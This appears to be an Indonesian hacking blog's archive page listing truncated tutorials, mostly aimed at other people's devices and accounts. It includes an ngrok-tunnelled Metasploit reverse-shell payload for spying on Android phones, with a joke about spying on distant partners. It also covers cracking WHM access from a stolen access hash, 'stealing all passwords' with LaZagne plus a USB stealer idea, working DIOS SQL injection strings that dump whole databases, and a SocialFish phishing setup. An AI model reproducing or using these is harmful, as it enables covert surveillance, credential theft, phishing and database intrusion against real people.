Skip to main content

Posts

Showing posts from February, 2018

Cara Menyadap Android Dengan Metasploit

squadcyber.org - Hay guys, kali ini gw akan membawakan tutorial Cara Menyadap Android Dengan Metasploit yang berbeda jaringan dengan kita, jadi kita bisa menyadap orang yang jauh dengan kita, contoh nya orang yang sedang menjalin hubungan LDR :"v. Sebelum kita memasuki tutorial nya, lengkapi terlebih dahulu alat-alat yang akan kita gunakan. Ngrok bisa di lihat di sini Tutorial install Metasploit Cara Install Metasploit Di Android Menggunakan GNURoot     Auto Install Metasploit (Termux) Install Metasploit Framework di Windows Setelah semua alat tersedia, langsung kita lanjut ke tutorial nya. Cara Menyadap Android Yang Berbeda Jaringan Dengan Menggunakan Metasploit Pertama kita jalankan terlebih dahulu ngrok nya  [v3rluchie@parrot]─[~] └──╼ $ ./ngrok tcp 4444 Setelah ngrok nya berjalan, kita buka tab kedua dan lanutkan membuat payload metasploit nya dengan mengetik. [v3rluchie@parrot]─[~] └──╼ $ msfvenom -p android/meterpreter/reverse_tcp LHOST...

Yuki Chan - Automate Pentest Tool

squadcyber.org - Yuki Chan adalah Tool Auto Pentest yang berjalan dengan bahasa pemrograman bash yang sangat berguna bagi kalian yang ingin melakukan Pentest tapi males hehe. Sangat di anjurkan bagi kalian yang ingin menginstall Yuki Chan - Automate Pentest Tool untuk menggunakan Distro Penetration Testing/For Ethical Hacking seperti Kali Linux, ParrotSec Os, dan lain nya. Karena jika kalian menggunakan Distro selain Distro Penetration Testing/For Ethical Hacking, maka akan lebih susah dalam proses instlasi Yuki Chan - Automate Pentest Tool tersebut. Fitur Automated Intel-Gathering Vulnerability Analysis Security Auditing OSINT Tracking System Enumeration Fuzzing CMS Auditing SSL Security Auditing And Off Course This Tool Designed For Targetted Pentesting Too Modul  Whois domain analyzer Nslookup Nmap TheHarvester Metagoofil DNSRecon Sublist3r Wafw00f WAFNinja XSS Scanner WhatWeb Spaghetti WPscan WPscanner WPSeku Droopescan ( CMS Vulnera...

WPGETIN - WordPress Get Informations

squadcyber.org - WPGETIN adalah sebuah tool yang berjalan dalam bahasa pemrograman Perl yang berfungsi untuk mendapatkan informasi sebuah Website yang menggunakan CMS Wordpress. Fitur Get User Information Get Theme Information Get Plugins Information Get Wordpress Version  Cara Install WPGETIN $ apt-get install perl $ git clone https://github.com/AlHikamWolf/WPGETIN Untuk cara pemakaian nya kalian cukup masuk ke dalam folder WPGETIN dan sebelum nya kalian harus membuat list website.txt yang akan di scan, lalu ketik kan kode di bawah ini. $ perl setup.pl Dan masuk kan list website.txt yang sudah kalian buat tadi. Sekian tutorial WPGETIN - WordPress Get Informations kali ini. Semoga bermanfaat.

Crack WHM Dari Access Hash Menggunakan Modify Header

squadcyber.org - Hay guys, pernah nggak kalian nemu file WHM-accesshash.txt pada saat grab config, tapi ngga tau apa yang harus di lakuin agar kita dapet akses WHM tersebut?. Nah, kali ini gw akan membagikan tutorial bagaimana cara nya kita crack WHM tersebut melalui WHM-accesshash.txt dengan Modify Header. Download Add-on Modify Header nya di sini . Pertama kalian buka file WHM-accesshash.txt yang kalian dapat dari grab config. Lalu kalian copas ini dari WHM-accesshash.txt tersebut ke notepad. Setelah kalian copas, hapus ENTER pada hash tersebut dan jadikan 1 baris. Di depan hash tersebut, kita tambahkan "WHM namauser:hash tersebut", contoh user gw nama nya "vali" Nyalakan terlebih dahulu Add-on Modify Header nya. Lalu kita buka Add-on Modify Header nya, dan isi kan seperti kolom di bawah. Contoh : Setelah itu pencet tanda  +    , Dan buka IP Server nya dengan di tambahkan /whm di belakang nya, contoh : 201.182.97.69/whm ...

Mencuri Semua Password Yang Ada Di Komputer Dengan LaZagne

squadcyber.org - Hay guys, kali ini gw akan membagikan tutorial bagaimana cara nya nge-Dump Password Yang Ada Di Komputer Dengan LaZagne, yup cara ini bisa dibilang juga nyolong password orang hehe. Sebelum kita menggunakannya, alangkah baik nya kita mengetahui fungsi dari tool LaZagne ini. Lazagne adalah aplikasi berbasis command line ringan yang dirancang untuk membantu kamu memulihkan password yang hilang atau lupa dari browser, beberapa email client dan bahkan beberapa FTP transfer dan system administration tools. Cara Dump Password Yang Ada Di Komputer Dengan LaZagne Pertama kalian download dulu LaZagne nya di sini , seteah itu ekstrak file nya dan buka cmd dan pindah ke folder dimana LaZagne.exe di letak kan, lalu ketik kan kode di bawah ini laZagne.exe all Maka password yang ada di komputer kalian akan tampil dengan sendirinya hehe :v, dan sebenarnyatool ini juga bisa di gunakan untuk USB STEALER dengan memasukkan file laZagne tersebut dan command autorun pa...

Crawler Website Penetration Security Tool

squadcyber.org - Crawler Website Penetration Security Tool adalah tool untuk merayapi ( crawl ) website yang ingin kita cari kelemahan nya dengan mencari dan mendata semua directory pada website target. Fitur :  Crawler http maupun https  Menganalisis jenis file sebelum di crawl  Fast crawl  Identifikasi index dir  Crawl semua jenis file dengan membaca field header tipe content  Download hasil crawl  Otomatis Mendeteksi CMS Etc.  Cara Install  $ apt-get install python2 $ git clone https://github.com/dalpan/crawler dan untuk cara menggunakannya kalian cukup masuk ke directori crawler nya, dan ketik $ python2 https://github.com/dalpan/crawler

Sqli Manual With DIOS

squadcyber.org -  DIOS (Dump In One Shoot) yang artinya kita bisa Dump / mengeluarkan isi database dengan 1 kali request, pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh Dr.z3r0 ,M@dbl00d ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya. DIOS cheatsheet Query untuk Dump Semua Tabel dan Kolom Profexer Query (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) Dr.z3r0 Query (select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@))) Zen Query make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) m@db100d Query (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2)...

Hack Akun Social Media Dengan SocialFish (Phising)

squadcyber.org - Hay guys, setelah kemaren gw membawakan tutorial Hack Akun Social Media Dengan Weeman (phising) , kali ini gw akan membawakan tutorial Phising lagi namun dengan tools yang berbeda, yup, SocialFish nama nya. SocialFish adalah Phising tool yang di gabungkan dengan ngrok di dalam nya, jadi tidak usah repot-repot lagi kalian meng-install ngrok nya untuk port forwadding , ketika kalian menjalankan SocialFish nya maka ngrok otomatis menjalankan server nya dengan sendiri nya. Tidak seperti Weeman yang harus install ngrok secara manual untuk melakukan port forwadding agar phising tersebut bisa di sebarkan kepada korban yang berbeda jaringan dengan kita. Fitur Facebook Google LinkedIn Github StackOverflow WordPress Twitter Cara Install SocialFish  $ git clone https://github.com/UndeadSec/SocialFish $ cd SocialFish $ pip install -r requirements.txt  Untuk Cara Install SocialFish di Termux  sama seperti ini jad tidak usah resah bagi k...

AV3Ce | Telegram Penetration Testing Bot

squadcyber.org - AV3Ce adalah bot Telegram yang di gunakan untuk Penetration Testing secara otomatis, di bot ini kita bisa menjalankan tool penetration tanpa harus meng-install tools terlebih dahulu tentu nya lebih memudah kan bagi orang yang mau Penetration Testing tapi pas mau install tool nya eh storage nya penuh hehe. Fitur Find Sub Domain TCP Port Scanner Email Gath DNS Recon Password Generator Dorking Scan HTTP Header  Lokomedia Hack Crypto Currencies Cara Install AV3Ce Untuk cara install nya kalian cukup meng-install aplikasi Telegram di google play store, dan add id telegram ini  @av3cbot Demikian artikel  AV3Ce | Telegram Penetration Testing Bot  semoga bermanfaat, jangan lupa share :)

Crips IP Tools | Information Gathering

squadcyber.org   - Crips adalah suatu tool information gathering yang dapat di gunakan di Terminal Linux maupun Windows Fitur Whois lookup Traceroute DNS Lookup Reverse DNS Lookup GeoIP Lookup Port Scan Reverse IP Lookup Cara Install Crips $ apt-get update && apt-get upgrade $ apt-get install python2 $ git clone https://github.com/Manisso/Crips $ cd Crips $ python2 Crips.py Demikian Crips IP Tools kali ini. Semoga bermanfaat.